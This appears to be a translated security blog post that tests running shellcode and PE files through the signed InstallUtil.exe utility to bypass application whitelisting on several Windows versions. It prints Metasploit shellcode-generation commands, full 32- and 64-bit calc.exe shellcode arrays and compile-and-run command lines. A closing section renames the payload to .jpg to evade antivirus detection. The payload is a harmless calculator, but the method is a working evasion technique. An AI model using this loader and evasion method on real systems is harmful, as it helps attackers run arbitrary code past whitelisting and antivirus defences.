More tests that bypass restrictions using the whitelist

More tests that bypass restrictions using the whitelist

0x00 Preface

In this blog, subteedoes not only introduce how to use installutil.exe to directly execute the pe file, but also introduces another method --Execute shellcode using InstallUtilFrom the code shared by subTee, we can see that the test environment is 64-bit and. net4.0. The article published on 360 security broadcast also believes that the execution environment must be. net4.0 or above, and the application scope is narrow.But I don't think so.

Next we will draw our new conclusion through actual tests.

Test two ways to use InstallUtil to study the environment

0x02 test environment

xp x86win7 x86win7 x64win8 x86win8 x64

0x03 Test Method 1 use installutil.exe to execute the pe File

Run the Code:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.csC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

Note: I will give a detailed introduction to this article.

2. Use installutil.exe to directly execute shellcode

Download link: https://gist.github.com/subTee/a06d4ae23e2517566c52

Save the downloaded file as Shellcode. cs and execute the code according to its description:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

0x04 actual test

Note: The above code needs to be modified based on different operating system versions.

1. xp x86

The. net environment is not included by default and is not tested for the moment, but it can provide reference for the final conclusion.

2. win7 x86

Default. net Environment

(1)Use installutil.exe to execute the pe File

. Net 3.5 failed to compile PELoader. cs

(2)Use installutil.exe to directly execute shellcode

Generate 32-bit shellcode through msf

use windows/execset CMD calc.exeset EXITFUNC threadgenerate -t csharp

byte[] buf = new byte[195] {0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };

Replace byte [] Shellcode in shellcode. cs

Run the following code:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe  /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Shellcode is successfully executed. A calculator is displayed.

360 successfully detected and killed,

2. win7 x64

Default. net Environment

(1)Use installutil.exe to execute the pe File

. Net 3.5 failed to compile PELoader. cs

(2)Use installutil.exe to directly execute shellcode

Use msf to generate 64-bit shellcode

use windows/x64/execset CMD calc.exeset EXITFUNC threadgenerate -t csharp

byte[] buf = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };

Replace byte [] Shellcode in shellcode. cs

Use csc.exeand installutil.exe in. net 2.0 x64to execute the Code:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Shellcode is successfully executed. A calculator is displayed.

If you use csc.exeand installutil.exe in. net 2.0 x86, run the following code:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

An error is reported,

Test the exeshellx64.exe killing situation. 360 is good,

3. win8 x86

The default. net Environment supports 4.0

(1)Use installutil.exe to execute the pe File

Run the Code:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.csC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

An exception occurred during execution in a 32-bit system.

(2)Use installutil.exe to directly execute shellcode

Run the following code:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe  /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Shellcode is successfully executed. A calculator is displayed.

Test the win8x86exeshell.exe killing situation. The results are as good as 360,

4. win8 x64

The default. net Environment supports 4.0,

(1)Use installutil.exe to execute the pe File

. Net 4.0 successfully executed

(2)Use installutil.exe to directly execute shellcode

Use csc.exeand installutil.exe in. net 4.0 x64to execute the Code:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Error,

Use csc.exeand installutil.exe in. net 4.0 x86to execute the Code:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe  /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Error,

To reach a correct conclusion, install. net framework x64 2.0 on the win8 x64 system.

Use csc.exeand installutil.exe to execute the Code:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.csC:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Shellcode is successfully executed. A calculator is displayed.

0x05 Supplement

In the above test, the. net environment provided by the operating system is not absolute. If the application is installed, the corresponding version of. net environment will be installed by default.

0x06 test conclusion (1)use installutil.exe to execute the pe File

Applicable to 64-bit systems and Microsoft. NET Framework 4.0 Environments

(2)use installutil.exe to directly execute shellcode

Applicable to. NET Framework 2.0 and specific environments

0x07 kill-free

Only a simple and effective method is provided.

Follow the instructions in the previous article to execute the Code as follows:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.jpg Shellcode.csC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.jpg

Change the file suffix to escape static detection and removal. As for active defense, the entire process is still not triggered.

A damaged image is displayed normally.

Scan and kill Test

But in fact, you can open it in this way,

0x08 Summary

There are still many ways to use this technology, and the most important ideas

Other methods, such as PowerShell, Exploit/Migrate, WMI Providers, and. COM proxy, are worth studying to break through the whitelist restrictions.